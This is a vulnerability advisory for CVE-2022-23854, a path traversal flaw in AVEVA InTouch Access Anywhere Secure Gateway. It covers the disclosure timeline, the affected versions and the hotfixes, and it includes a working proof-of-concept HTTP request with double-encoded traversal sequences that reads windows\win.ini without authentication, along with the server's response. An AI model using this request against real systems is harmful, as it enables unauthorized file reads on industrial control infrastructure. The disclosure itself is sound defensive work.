AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal
Author: Jens Regel, CRISEC IT-Security https://crisec.de
Timeline
- 25.06.2021 Vulnerability discovered
- 25.06.2021 Details sent to custfirstsupport@aveva.com
- 21.09.2021 Vendor response, fix available until Q1/2022
- 25.09.2021 Vendor released Tech Alert TA000022335
- 06.09.2022 Public disclosure
CVE: CVE-2022-23854
Vendor
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
Affected Products
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older
Details
The InTouch Access Anywhere Secure Gateway versions 2020 R2 and older contain a relative path traversal vulnerability that allows an unauthenticated user with network access to read files on the system outside the Secure Gateway web server.
Proof of Concept
GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1Fix
- InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
- InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix